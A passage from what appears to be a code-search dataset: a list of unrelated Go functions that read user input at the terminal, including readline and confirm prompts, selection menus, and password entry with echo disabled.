processedArgs...)\n\n\tstdin, err := cmd.StdinPipe()\n\n\tif err != nil {\n\t\tlog.Fatalf(\"Error getting pipe: %s\", err)\n\t}\n\n\tgo func(stdin io.WriteCloser) {\n\t\tdefer stdin.Close()\n\t\tio.WriteString(stdin, strings.Join(options, \"\\n\"))\n\t}(stdin)\n\n\tbyteOut, err := cmd.Output()\n\n\tif err != nil {\n\t\tif exiterr, ok := err.(*exec.ExitError); ok {\n\t\t\tif status, ok := exiterr.Sys().(syscall.WaitStatus); ok {\n\t\t\t\tif status.ExitStatus() == 1 {\n\t\t\t\t\terr = &EmptySelectionError{}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\treturn \"\", err\n\t}\n\n\t// Cast and trim\n\tselection = strings.TrimSpace(string(byteOut))\n\n\treturn\n}", "func NewPrompt() *Prompt {\n\treturn &Prompt{\n\t\tReader: os.Stdin,\n\t\tWriter: os.Stdout,\n\t\tOptions: DefaultOptions,\n\t}\n}", "func promptString(question string, details string) (answer string) {\n\tfmt.Print(colors.Blue(question) + \" (\" + details + \"): \")\n\tfmt.Scanln(&answer)\n\treturn\n}", "func Prompt(a interfaces.AssumeCredentialProcess, emoji string, prefix string, message string) {\n\ts := a.GetDestination()\n\tformatted := format(a, textColorPrompt, emoji, prefix, message)\n\tfmt.Fprint(s, formatted)\n}", "func (cp *ConfirmPrompt) Run() (string, error) {\n\tswitch cp.Default {\n\tcase \"Y\", \"N\", \"n\", \"y\":\n\tcase \"\":\n\t\tcp.Default = \"N\"\n\tdefault:\n\t\treturn \"\", ErrorIncorrect\n\t}\n\terr := cp.Init()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tcp.confirmDefault = strings.ToUpper(cp.Default)\n\n\tcp.c.Stdin = ioutil.NopCloser(io.MultiReader(bytes.NewBuffer([]byte(cp.out)), os.Stdin))\n\n\tcp.rl, err = readline.NewEx(cp.c)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tcp.punctuation = \"?\"\n\tanswers := \"y/N\"\n\tif strings.ToLower(cp.Default) == \"y\" {\n\t\tanswers = \"Y/n\"\n\t}\n\tif cp.ConfirmOpt != \"\" {\n\t\tanswers = answers + \"/\" + cp.ConfirmOpt\n\t}\n\tcp.suggestedAnswer = \" \" + faint(\"[\"+answers+\"]\")\n\t// cp.confirmDefault = strings.ToUpper(cp.Default)\n\t// cp.Default = \"\"\n\tcp.prompt = cp.LabelInitial(cp.Label) + cp.punctuation + cp.suggestedAnswer + \" \"\n\t// cp.out = cp.Default\n\t// cp.c.Stdin = ioutil.NopCloser(io.MultiReader(bytes.NewBuffer([]byte(cp.out)), os.Stdin))\n\n\tsetupConfirm(cp.c, cp.prompt, cp, cp.rl)\n\tcp.out, err = cp.rl.Readline()\n\tif cp.out == \"\" {\n\t\tcp.out = cp.confirmDefault\n\t}\n\tif err != nil {\n\t\tif err.Error() == \"Interrupt\" {\n\t\t\terr = ErrInterrupt\n\t\t}\n\t\tcp.rl.Write([]byte(\"\\n\"))\n\t\treturn \"\", err\n\t}\n\tcp.out = strings.ToUpper(cp.out)\n\tcp.state = cp.IconGood\n\tcp.out = cp.Formatter(cp.out)\n\tseparator := \" \"\n\tif cp.NoIcons {\n\t\tseparator = \"\"\n\t}\n\tcp.rl.Write([]byte(cp.Indent + cp.state + separator + cp.prompt + cp.InputResult(cp.out) + \"\\n\"))\n\treturn cp.out, err\n}", "func ReadString(prompt string) ([]byte, error) {\n\treader := bufio.NewReader(os.Stdin)\n\tfmt.Fprintf(os.Stderr, \"%v \", prompt)\n\tline, _ := reader.ReadString('\\n')\n\tline = strings.TrimRight(line, \" \\n\\r\")\n\treturn []byte(line), nil\n}", "func RunPrompt() error {\n\trl, err := readline.New(\"> \")\n\tif err != nil {\n\t\treturn fmt.Errorf(\"could not run interactive: %v\", err)\n\t}\n\tdefer rl.Close()\n\n\tfor {\n\t\tline, err := rl.Readline()\n\t\tif err != nil {\n\t\t\tif errors.Is(err, io.EOF) {\n\t\t\t\tbreak\n\t\t\t} else {\n\t\t\t\treturn fmt.Errorf(\"failed to read user input: %v\", err)\n\t\t\t}\n\t\t}\n\t\trun(line)\n\t}\n\treturn nil\n}", "func Prompt(prompt string, refresh func(int, int)) string {\n\treturn PromptWithCallback(prompt, refresh, nil)\n}", "func (p *Prompt) Run() (string, error) {\n\terr := p.Init()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tp.c.Stdin = ioutil.NopCloser(io.MultiReader(bytes.NewBuffer([]byte(p.Default)), os.Stdin))\n\n\tp.rl, err = readline.NewEx(p.c)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tvar (\n\t\tfirstListen = true\n\t\twroteErr = false\n\t\tcaughtup = true\n\t)\n\n\tif p.Default != \"\" {\n\t\tcaughtup = false\n\t}\n\n\tif p.Mask != 0 {\n\t\tp.c.EnableMask = true\n\t\tp.c.MaskRune = p.Mask\n\t}\n\n\tvar onelineReader = func(line []rune, pos int, key rune) ([]rune, int, bool) {\n\t\tif key == readline.CharEnter {\n\t\t\treturn nil, 0, false\n\t\t}\n\t\tif p.Mask != 0 && key == 42 {\n\t\t\tp.c.EnableMask = !p.c.EnableMask\n\t\t\tp.rl.Refresh()\n\t\t\treturn append(line[:pos-1], line[pos:]...), pos - 1, true\n\t\t}\n\n\t\tif firstListen {\n\t\t\tfirstListen = false\n\t\t\treturn nil, 0, false\n\t\t}\n\n\t\tif !caughtup && p.out != \"\" {\n\t\t\tif string(line) == p.out {\n\t\t\t\tcaughtup = true\n\t\t\t}\n\t\t\tif wroteErr {\n\t\t\t\treturn nil, 0, false\n\t\t\t}\n\t\t}\n\n\t\terr := p.validFn(string(line))\n\t\tif err != nil {\n\t\t\tif _, ok := err.(*ValidationError); ok {\n\t\t\t\tp.state = p.IconBad\n\t\t\t} else {\n\t\t\t\tp.rl.Close()\n\t\t\t\treturn nil, 0, false\n\t\t\t}\n\t\t} else {\n\t\t\tif string(line) == \"\" {\n\t\t\t\tp.state = p.IconInitial\n\t\t\t} else {\n\t\t\t\tp.state = p.IconGood\n\t\t\t}\n\t\t}\n\n\t\tp.rl.SetPrompt(p.Indent + p.state + \" \" + p.PromptInitial(p.prompt))\n\t\tp.rl.Refresh()\n\t\twroteErr = false\n\n\t\treturn nil, 0, false\n\t}\n\n\tp.c.SetListener(onelineReader)\n\n\tfor {\n\t\tp.out, err = p.rl.Readline()\n\n\t\tvar msg string\n\t\tvalid := true\n\t\toerr := p.validFn(p.out)\n\t\tif oerr != nil {\n\t\t\tif verr, ok := oerr.(*ValidationError); ok {\n\t\t\t\tmsg = verr.msg\n\t\t\t\tvalid = false\n\t\t\t\tp.state = p.IconBad\n\t\t\t} else {\n\t\t\t\tp.rl.Close()\n\t\t\t\treturn \"\", oerr\n\t\t\t}\n\t\t}\n\n\t\tif valid {\n\t\t\tp.state = p.IconGood\n\t\t\tbreak\n\t\t}\n\n\t\tif err != nil {\n\t\t\tswitch err {\n\t\t\tcase readline.ErrInterrupt:\n\t\t\t\terr = ErrInterrupt\n\t\t\tcase io.EOF:\n\t\t\t\terr = ErrEOF\n\t\t\t}\n\n\t\t\tbreak\n\t\t}\n\n\t\tcaughtup = false\n\n\t\tp.c.Stdin = ioutil.NopCloser(io.MultiReader(bytes.NewBuffer([]byte(p.out)), os.Stdin))\n\t\tp.rl, _ = readline.NewEx(p.c)\n\n\t\tfirstListen = true\n\t\twroteErr = true\n\t\tp.rl.SetPrompt(\"\\n\" + red(\"Error: \") + msg + upLine(1) + \"\\r\" + p.Indent + p.state + \" \" + p.PromptInitial(p.prompt))\n\t\tp.rl.Refresh()\n\t}\n\n\t// if wroteErr {\n\t// \trl.Write([]byte(downLine(1) + clearLine + upLine(1) + \"\\r\"))\n\t// }\n\n\tif err != nil {\n\t\tif err.Error() == \"Interrupt\" {\n\t\t\terr = ErrInterrupt\n\t\t}\n\t\tp.rl.Write([]byte(\"\\n\"))\n\t\treturn \"\", err\n\t}\n\n\tp.out = p.Formatter(p.out)\n\n\techo := p.out\n\tif p.Mask != 0 {\n\t\techo = strings.Repeat(string(p.Mask), len([]rune(echo)))\n\t}\n\n\tp.rl.Write([]byte(p.Indent + p.state + \" \" + p.prompt + p.InputResult(echo) + \"\\n\"))\n\n\treturn p.out, err\n}", "func (v Repository) Prompt() string {\n\tif v.Path == \".\" {\n\t\treturn \"\"\n\t}\n\treturn v.Path + \"> \"\n}", "func (bp *BasicPrompt) Init() error {\n\tbp.c = &readline.Config{}\n\n\terr := bp.c.Init()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif bp.stdin != nil {\n\t\tbp.c.Stdin = ioutil.NopCloser(bp.stdin)\n\t}\n\n\tif bp.stdout != nil {\n\t\tbp.c.Stdout = bp.stdout\n\t}\n\n\tif bp.IsVimMode {\n\t\tbp.c.VimMode = true\n\t}\n\n\tif bp.Preamble != nil {\n\t\tfmt.Println(*bp.Preamble)\n\t}\n\n\tif bp.IconInitial == \"\" && !bp.NoIcons {\n\t\tbp.IconInitial = bold(IconInitial)\n\t}\n\tif bp.IconGood == \"\" && !bp.NoIcons {\n\t\tbp.IconGood = bold(IconGood)\n\t}\n\tif bp.IconQuest == \"\" && !bp.NoIcons {\n\t\tbp.IconQuest = bold(IconQuest)\n\t}\n\tif bp.IconWarn == \"\" && !bp.NoIcons {\n\t\tbp.IconWarn = bold(IconWarn)\n\t}\n\tif bp.IconBad == \"\" && !bp.NoIcons {\n\t\tbp.IconBad = bold(IconBad)\n\t}\n\tif bp.LabelInitial == nil {\n\t\tbp.LabelInitial = func(s string) string { return s }\n\t}\n\tif bp.LabelResult == nil {\n\t\tbp.LabelResult = func(s string) string { return s }\n\t}\n\tif bp.PromptInitial == nil {\n\t\tbp.PromptInitial = func(s string) string { return bold(s) }\n\t}\n\tif bp.PromptResult == nil {\n\t\tbp.PromptResult = func(s string) string { return s }\n\t}\n\tif bp.InputInitial == nil {\n\t\tbp.InputInitial = func(s string) string { return s }\n\t}\n\tif bp.InputResult == nil {\n\t\tbp.InputResult = func(s string) string { return faint(s) }\n\t}\n\tif bp.Formatter == nil {\n\t\tbp.Formatter = func(s string) string { return s }\n\t}\n\tbp.c.Painter = &defaultPainter{style: bp.InputInitial}\n\n\tbp.suggestedAnswer = \"\"\n\tbp.punctuation = \":\"\n\tbp.c.UniqueEditLine = true\n\n\tbp.state = bp.IconInitial\n\tbp.prompt = bp.LabelInitial(bp.Label) + bp.punctuation + bp.suggestedAnswer + \" \"\n\n\tbp.c.Prompt = bp.Indent + bp.state + \" \" + bp.PromptInitial(bp.prompt)\n\tbp.c.HistoryLimit = -1\n\n\tbp.c.InterruptPrompt = bp.InterruptPrompt\n\n\tbp.validFn = func(x string) error {\n\t\treturn nil\n\t}\n\n\tif bp.Validate != nil {\n\t\tbp.validFn = bp.Validate\n\t}\n\n\treturn nil\n}", "func (c *Confirm) Prompt(rl *readline.Instance) (interface{}, error) {\n\t// render the question template\n\tout, err := core.RunTemplate(\n\t\tConfirmQuestionTemplate,\n\t\tConfirmTemplateData{Confirm: *c},\n\t)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// use the result of the template as the prompt for the readline instance\n\trl.SetPrompt(fmt.Sprintf(out))\n\n\t// start waiting for input\n\tanswer, err := c.getBool(rl)\n\t// if something went wrong\n\tif err != nil {\n\t\t// bubble up\n\t\treturn \"\", err\n\t}\n\n\t// convert the boolean into the appropriate string\n\treturn answer, nil\n}", "func SelectPrompt(items []string, label string) int {\n\n\tprompt := promptui.Select{Label: label, Items: items}\n\n\ti, _, e := prompt.Run()\n\n\tif e != nil {\n\t\treturn -1\n\t}\n\n\treturn i\n}", "func Prompt() string {\n\tfillMessage(&msg)\n\tgitMsg := msg.String()\n\tInfo(\"\\nCommit message is:\\n%s\\n\", gitMsg)\n\tvar err error\n\tcp := bb.ConfirmPrompt{\n\t\tBasicPrompt: bb.BasicPrompt{\n\t\t\tLabel: \"Is everything OK? Continue\",\n\t\t\tDefault: \"N\",\n\t\t\tNoIcons: true,\n\t\t},\n\t\tConfirmOpt: \"e\",\n\t}\n\tc, err := cp.Run()\n\tcheckConfirmStatus(c, err)\n\tif c == \"E\" {\n\t\tgitMsg, err = bb.Editor(\"\", gitMsg)\n\t\tcheckInterrupt(err)\n\t\tnumlines := len(strings.Split(gitMsg, \"\\n\")) + 2\n\t\tfor ; numlines > 0; numlines-- {\n\t\t\tfmt.Print(bb.ClearUpLine())\n\t\t}\n\t\tInfo(\"Commit message is:\\n%s\", gitMsg)\n\t\tcheckConfirmStatus(bb.Confirm(\"Is everything OK? Continue\", \"N\", true))\n\t\treturn gitMsg\n\t}\n\treturn gitMsg\n}", "func (cli *CliPrompter) ChooseWithDefault(pr string, defaultValue string, options []string) (string, error) {\n\tselected := \"\"\n\tprompt := &survey.Select{\n\t\tMessage: pr,\n\t\tOptions: options,\n\t\tDefault: defaultValue,\n\t}\n\t_ = survey.AskOne(prompt, &selected, survey.WithValidator(survey.Required))\n\n\t// return the selected element index\n\tfor i, option := range options {\n\t\tif selected == option {\n\t\t\treturn options[i], nil\n\t\t}\n\t}\n\treturn \"\", errors.New(\"bad input\")\n}", "func Prompt(question string) bool {\n\tfmt.Print(question)\n\tfmt.Print(\"? [y/N] \")\n\n\tvar answer string\n\t_, _ = fmt.Scanln(&answer)\n\n\tif answer == \"\" {\n\t\treturn false\n\t}\n\n\treturn answer[0] == 'Y' || answer[0] == 'y'\n}", "func AskForDefaultContext() string {\n\tfmt.Println(\"GoGit can operate out three different contexts: Organizational, Team and Personal. Which filters the resultsets of the various commands accordingly\")\n\tfmt.Println(\"This is overridable with the global flag --context team/org/Personal (or --c team/org/personal)\")\n\tcontext := getString(\"What default context would you like to use? (team,org,personal): \")\n\tif !stringInSlice(context, []string{\"org\", \"team\", \"personal\"}) {\n\t\tlog.Fatalln(\"input not in available options\")\n\t}\n\treturn context\n}", "func ConsolePromptAndAnswer(prompt string, replyLowercase bool, autoTrim ...bool) string {\n\tfmt.Print(prompt)\n\n\tanswer := \"\"\n\n\tif _, e := fmt.Scanln(&answer); e != nil {\n\t\tanswer = \"\"\n\t\tfmt.Println()\n\t} else {\n\t\tanswer = RightTrimLF(answer)\n\n\t\tif replyLowercase {\n\t\t\tanswer = strings.ToLower(answer)\n\t\t}\n\n\t\tif len(autoTrim) > 0 {\n\t\t\tif autoTrim[0] {\n\t\t\t\tanswer = Trim(answer)\n\t\t\t}\n\t\t}\n\n\t\tfmt.Println()\n\t}\n\n\treturn answer\n}", "func (f *Factor) Prompt() string { return f.driver().prompt(f) }", "func PrintPrompt() {\n\n\tvar prompt String\n\n\tme := syscall.GetUser()\n\tpath = \"/user/\" + me\n\tprompt = String(\"[\" + String(me) + \" @ \" + currDirectory + \"]: \")\n\n\taltEthos.WriteStream(syscall.Stdout, &prompt)\n\n}", "func terminalPrompt(prompt string) (string, error) {\n\tfmt.Printf(\"%s: \", prompt)\n\tb, err := terminal.ReadPassword(1)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tfmt.Println()\n\treturn string(b), nil\n}", "func (s *Selection) RunPrompt() (*Choice, error) {\n\ttmpl, err := s.initConfirmationTemplate()\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"initializing confirmation template: %w\", err)\n\t}\n\n\tm := NewModel(s)\n\n\tp := tea.NewProgram(m, tea.WithOutput(s.Output), tea.WithInput(s.Input))\n\tif err := p.Start(); err != nil {\n\t\treturn nil, fmt.Errorf(\"running prompt: %w\", err)\n\t}\n\n\tchoice, err := m.Choice()\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"reading choice: %w\", err)\n\t}\n\n\tif s.ConfirmationTemplate == \"\" {\n\t\treturn choice, nil\n\t}\n\n\tbuffer := &bytes.Buffer{}\n\n\terr = tmpl.Execute(buffer, map[string]interface{}{\n\t\t\"FinalChoice\": choice,\n\t\t\"Prompt\": m.Prompt,\n\t\t\"AllChoices\": m.Choices,\n\t\t\"NAllChoices\": len(m.Choices),\n\t\t\"TerminalWidth\": m.width,\n\t})\n\tif err != nil {\n\t\treturn choice, fmt.Errorf(\"execute confirmation template: %w\", err)\n\t}\n\n\t_, err = fmt.Fprint(s.Output, promptkit.Wrap(buffer.String(), m.width))\n\n\treturn choice, err\n}", "func (t *GenericPrompt) PromptString() string {\n\treturn t.PromptStr\n}", "func ReadString(prompt string) string {\n\treader := bufio.NewReader(os.Stdin)\n\tfmt.Print(prompt)\n\ttext, _ := reader.ReadString('\\n')\n\tcleanText := strings.TrimSpace(text)\n\tif cleanText == \"exit\" {\n\t\tlog.Fatal(\"exitting program...\")\n\t}\n\n\treturn cleanText\n}", "func ConsolePromptAndAnswerInt(prompt string, preventNegative ...bool) int {\n\tfmt.Print(prompt)\n\n\tanswer := \"\"\n\tresult := 0\n\n\tif _, e := fmt.Scanln(&answer); e != nil {\n\t\tfmt.Println()\n\t\treturn 0\n\t} else {\n\t\tanswer = RightTrimLF(answer)\n\t\tresult, _ = ParseInt32(answer)\n\n\t\tif result < 0 {\n\t\t\tif len(preventNegative) > 0 {\n\t\t\t\tif preventNegative[0] {\n\t\t\t\t\tresult = 0\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tfmt.Println()\n\t}\n\n\treturn result\n}", "func GetFromStdin(params *GetFromStdinParams) *string {\n\tparamutil.SetDefaults(params, defaultParams)\n\n\tvalidationRegexp, _ := regexp.Compile(params.ValidationRegexPattern)\n\tinput := \"\"\n\n\tfor {\n\t\tfmt.Print(params.Question)\n\n\t\tif len(params.DefaultValue) > 0 {\n\t\t\tfmt.Print(\"\\n\")\n\t\t\tlog.WriteColored(\"Press ENTER to use: \"+params.DefaultValue, ct.Green)\n\t\t}\n\t\tfmt.Print(\"\\n\")\n\n\t\tfor {\n\t\t\tfmt.Print(\"> \")\n\n\t\t\treader := bufio.NewReader(os.Stdin)\n\t\t\tnextLine := \"\"\n\n\t\t\tif params.IsPassword {\n\t\t\t\tinStreamFD := command.NewInStream(os.Stdin).FD()\n\t\t\t\toldState, err := term.SaveState(inStreamFD)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Fatal(err)\n\t\t\t\t}\n\n\t\t\t\tterm.DisableEcho(inStreamFD, oldState)\n\t\t\t\tnextLine, _ = reader.ReadString('\\n')\n\t\t\t\tterm.RestoreTerminal(inStreamFD, oldState)\n\t\t\t} else {\n\t\t\t\tnextLine, _ = reader.ReadString('\\n')\n\t\t\t}\n\n\t\t\tnextLine = strings.Trim(nextLine, \"\\r\\n \")\n\n\t\t\tif strings.Compare(params.InputTerminationString, \"\\n\") == 0 {\n\t\t\t\t// Assign the input value to input var\n\t\t\t\tinput = nextLine\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tinput += nextLine + \"\\n\"\n\n\t\t\tif strings.HasSuffix(input, params.InputTerminationString+\"\\n\") {\n\t\t\t\tinput = strings.TrimSuffix(input, params.InputTerminationString+\"\\n\")\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\n\t\tif len(input) == 0 && len(params.DefaultValue) > 0 {\n\t\t\tinput = params.DefaultValue\n\t\t}\n\t\tif validationRegexp.MatchString(input) {\n\t\t\tbreak\n\t\t} else {\n\t\t\tfmt.Print(\"Input must match \" + params.ValidationRegexPattern + \"\\n\")\n\t\t\tinput = \"\"\n\t\t}\n\t}\n\tfmt.Println(\"\")\n\n\treturn &input\n}", "func GetString(promptMessage string) string {\n\treader := bufio.NewReader(os.Stdin)\n\tfmt.Print(aurora.Bold(aurora.Cyan(promptMessage)))\n\tresponse, err := reader.ReadString('\\n')\n\tif err != nil {\n\t\tGeneralErr(err, \"Failed to parse input (ln 25 prompt.go)\")\n\t}\n\treturn strings.TrimRight(response, \"\\r\\n\")\n}", "func (term *Terminal) prompt(buf *Buffer, in io.Reader) (string, error) {\n\tinput, err := term.setup(buf, in)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tterm.History = append(term.History, \"\")\n\tterm.histIdx = len(term.History) - 1\n\tcurHistIdx := term.histIdx\n\n\tfor {\n\t\ttyp, char, err := term.read(input)\n\t\tif err != nil {\n\t\t\treturn buf.String(), err\n\t\t}\n\n\t\tswitch typ {\n\t\tcase evChar:\n\t\t\terr = buf.Insert(char)\n\t\t\tif err != nil {\n\t\t\t\treturn buf.String(), err\n\t\t\t}\n\n\t\t\tterm.History[curHistIdx] = buf.String()\n\t\tcase evSkip:\n\t\t\tcontinue\n\t\tcase evReturn:\n\t\t\terr = buf.EndLine()\n\t\t\tif err != nil {\n\t\t\t\treturn buf.String(), err\n\t\t\t}\n\n\t\t\tline := buf.String()\n\t\t\tif line == \"\" {\n\t\t\t\tterm.histIdx = curHistIdx - 1\n\t\t\t\tterm.History = term.History[:curHistIdx]\n\t\t\t} else {\n\t\t\t\tterm.History[curHistIdx] = line\n\t\t\t}\n\n\t\t\treturn line, nil\n\t\tcase evEOF:\n\t\t\terr = buf.EndLine()\n\t\t\tif err == nil {\n\t\t\t\terr = ErrEOF\n\t\t\t}\n\n\t\t\treturn buf.String(), err\n\t\tcase evCtrlC:\n\t\t\terr = buf.EndLine()\n\t\t\tif err == nil {\n\t\t\t\terr = ErrCTRLC\n\t\t\t}\n\n\t\t\treturn buf.String(), err\n\t\tcase evBack:\n\t\t\terr = buf.DelLeft()\n\t\t\tif err != nil {\n\t\t\t\treturn buf.String(), err\n\t\t\t}\n\n\t\t\tterm.History[curHistIdx] = buf.String()\n\t\tcase evClear:\n\t\t\terr = buf.ClsScreen()\n\t\t\tif err != nil {\n\t\t\t\treturn buf.String(), err\n\t\t\t}\n\t\tcase evHome:\n\t\t\terr = buf.Start()\n\t\t\tif err != nil {\n\t\t\t\treturn buf.String(), err\n\t\t\t}\n\t\tcase evEnd:\n\t\t\terr = buf.End()\n\t\t\tif err != nil {\n\t\t\t\treturn buf.String(), err\n\t\t\t}\n\t\tcase evUp:\n\t\t\tidx := term.histIdx\n\t\t\tif term.histIdx > 0 {\n\t\t\t\tidx--\n\t\t\t}\n\n\t\t\terr = buf.Set([]rune(term.History[idx])...)\n\t\t\tif err != nil {\n\t\t\t\treturn buf.String(), err\n\t\t\t}\n\n\t\t\tterm.histIdx = idx\n\t\tcase evDown:\n\t\t\tidx := term.histIdx\n\t\t\tif term.histIdx < len(term.History)-1 {\n\t\t\t\tidx++\n\t\t\t}\n\n\t\t\terr = buf.Set([]rune(term.History[idx])...)\n\t\t\tif err != nil {\n\t\t\t\treturn buf.String(), err\n\t\t\t}\n\n\t\t\tterm.histIdx = idx\n\t\tcase evRight:\n\t\t\terr = buf.Right()\n\t\t\tif err != nil {\n\t\t\t\treturn buf.String(), err\n\t\t\t}\n\t\tcase evLeft:\n\t\t\terr = buf.Left()\n\t\t\tif err != nil {\n\t\t\t\treturn buf.String(), err\n\t\t\t}\n\t\tcase evDel:\n\t\t\terr = buf.Del()\n\t\t\tif err != nil {\n\t\t\t\treturn buf.String(), err\n\t\t\t}\n\n\t\t\tterm.History[curHistIdx] = buf.String()\n\t\t}\n\t}\n}", "func SelectorCli(label string, options ...string) (string, error) {\n\ts := promptui.Select{\n\t\tLabel: label,\n\t\tItems: options,\n\t}\n\n\t_, result, err := s.Run()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\treturn result, nil\n}", "func (opts *InitEnvOpts) Ask() error {\n\tif opts.EnvName == \"\" {\n\t\tenvName, err := opts.prompt.Get(\n\t\t\t\"What is your environment's name?\",\n\t\t\t\"A unique identifier for an environment (e.g. dev, test, prod)\",\n\t\t\tvalidateEnvironmentName,\n\t\t)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"failed to get environment name: %w\", err)\n\t\t}\n\t\topts.EnvName = envName\n\t}\n\treturn nil\n}", "func (t *Term) Prompt(prompt string) {\n\tt._prompt = prompt\n}", "func (p Prompt) Prompt(window_id string) (dbus.Variant, error) {\n\t// spec: Prompt(IN String window-id);\n\tempty := dbus.Variant{}\n\tconn, err := dbus.SessionBus()\n\tif err != nil {\n\t\treturn empty, err\n\t}\n\tcmp := make(chan *dbus.Signal, 5)\n\tconn.Signal(cmp)\n\tcall := p.Call(_PromptPrompt, 0, window_id)\n\tif call.Err != nil {\n\t\treturn empty, call.Err\n\t}\n\tfor {\n\t\tselect {\n\t\tcase sig := <-cmp:\n\t\t\tif sig.Name == _PromptCompleted {\n\t\t\t\tif sig.Body[0].(bool) {\n\t\t\t\t\treturn empty, PromptDismissed\n\t\t\t\t}\n\t\t\t\treturn sig.Body[1].(dbus.Variant), nil\n\t\t\t}\n\t\tcase <-time.After(time.Duration(time.Minute)):\n\t\t\terr := p.Dismiss()\n\t\t\tif err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t\treturn empty, Timeout\n\t\t}\n\t}\n}", "func Prompt(get chan int,\n\trecv chan int,\n\tout chan int) {\n\tfor {\n\t\tget <- 1\n\t\tout <- <-recv\n\t}\n}", "func PromptMessage(a ...interface{}) (n int, err error) {\n\treturn MessageWithType(MsgPrompt, a...)\n}", "func (cli CLI) AskNumber(max int, defaultNum int) (int, error) {\n\n\tsigCh := make(chan os.Signal, 1)\n\tsignal.Notify(sigCh, os.Interrupt)\n\tdefer signal.Stop(sigCh)\n\n\tresult := make(chan int, 1)\n\tgo func() {\n\t\tfor {\n\n\t\t\tfmt.Fprintf(cli.errStream, \"Your choice? [default: %d] \", defaultNum)\n\n\t\t\tvar line string\n\t\t\tif _, err := fmt.Fscanln(os.Stdin, &line); err != nil {\n\t\t\t\tDebugf(\"Failed to scan stdin: %s\", err.Error())\n\t\t\t}\n\n\t\t\tDebugf(\"Input: %q\", line)\n\n\t\t\t// Use Default value\n\t\t\tif line == \"\" {\n\t\t\t\tresult <- defaultNum\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\t// Convert string to int\n\t\t\tn, err := strconv.Atoi(line)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Fprintf(cli.errStream, \" is not a valid choice. Choose by number.\\n\\n\")\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// Check input is in range\n\t\t\tif n < 1 || max < n {\n\t\t\t\tfmt.Fprintf(cli.errStream, \" is not a valid choice. Choose from 1 to %d\\n\\n\", max)\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tresult <- n\n\t\t\tbreak\n\t\t}\n\t}()\n\n\tselect {\n\tcase <-sigCh:\n\t\treturn -1, fmt.Errorf(\"interrupted\")\n\tcase num := <-result:\n\t\treturn num, nil\n\t}\n}", "func prompNewPort() (string, error) {\n\treader := bufio.NewReader(os.Stdin)\n\tfmt.Print(\"Please enter a new port: \")\n\treturn reader.ReadString('\\n')\n}", "func NewPrompt(opts PromptOptions) *Prompt {\n\treturn &Prompt{\n\t\tin: bufio.NewReader(opts.in),\n\t\tout: bufio.NewWriter(opts.out),\n\t}\n}", "func prompt() {\n\tfmt.Printf(\"> Press Enter to continue \")\n\tscanner := bufio.NewScanner(os.Stdin)\n\tfor scanner.Scan() {\n\t\tbreak\n\t}\n\tif err := scanner.Err(); err != nil {\n\t\tpanic(err)\n\t}\n}", "func ConsolePromptAndAnswerBool(prompt string, defaultTrue ...bool) bool {\n\tfmt.Print(prompt)\n\n\tanswer := \"\"\n\tresult := false\n\tdefVal := false\n\n\tif len(defaultTrue) > 0 {\n\t\tif defaultTrue[0] {\n\t\t\tdefVal = true\n\t\t}\n\t}\n\n\tif _, e := fmt.Scanln(&answer); e != nil {\n\t\tfmt.Println()\n\t\treturn defVal\n\t} else {\n\t\tanswer = RightTrimLF(answer)\n\n\t\tif LenTrim(answer) > 0 {\n\t\t\tresult, _ = ParseBool(answer)\n\t\t} else {\n\t\t\tresult = defVal\n\t\t}\n\n\t\tfmt.Println()\n\t}\n\n\treturn result\n}", "func AskForInput() (string, error) {\n\tfmt.Println(\"\\nEnter a sequence of integers, divided by spaces.\")\n\tfmt.Print(\">> \")\n\n\tscanner := bufio.NewScanner(os.Stdin)\n\tscanner.Scan()\n\n\tfmt.Println()\n\n\treturn scanner.Text(), scanner.Err()\n}", "func Readline(prompt string, interfaces ...interface{}) (string, error) {\n\treader := bufio.NewReader(os.Stdin)\n\tfmt.Printf(prompt, interfaces...)\n\tinput, err := reader.ReadString('\\n')\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tinput = strings.Trim(input, \"\\n\\r\")\n\treturn input, nil\n}", "func Ask(question string) string {\n\tfmt.Fprintln(Out, question)\n\n\treturn prompt()\n}", "func Menu(username string) {\r\n\r\n\tvar response string\r\n\tin := bufio.NewReader(os.Stdin)\r\n\r\n\tfor {\r\n\r\n\t\tfmt.Println()\r\n\t\tfmt.Println(\"\\t\\tWelcome to our Chat Service\", username+\"!\\n\")\r\n\t\tfmt.Println(\"Select one of the choices below!\")\r\n\t\tfmt.Println(\"1. Create a new channel\")\r\n\t\tfmt.Println(\"2. Join an existing channel\")\r\n\t\tfmt.Println(\"3. Start a direct message with another user\")\r\n\t\tfmt.Println(\"4. Quit\")\r\n\r\n\t\tfmt.Print(\"Select a number 1-4: \")\r\n\t\tresponse, _ = in.ReadString('\\n')\r\n\t\tresponse = strings.TrimSpace(response)\r\n\r\n\t\tswitch response {\r\n\r\n\t\tcase \"1\":\r\n\t\t\taddch.Begin()\r\n\t\tcase \"2\":\r\n\t\t\tjoinch.Begin(username)\r\n\t\tcase \"3\":\r\n\t\t\tdm.RunDM(username)\r\n\t\tcase \"4\":\r\n\t\t\tfmt.Println(\"Thank you\", username, \"for chatting with us!\")\r\n\t\t\tos.Exit(1)\r\n\t\tdefault:\r\n\t\t\tfmt.Println(\"Invalid response. Please try again.\")\r\n\t\t\tcontinue\r\n\t\t}\r\n\t}\r\n}", "func 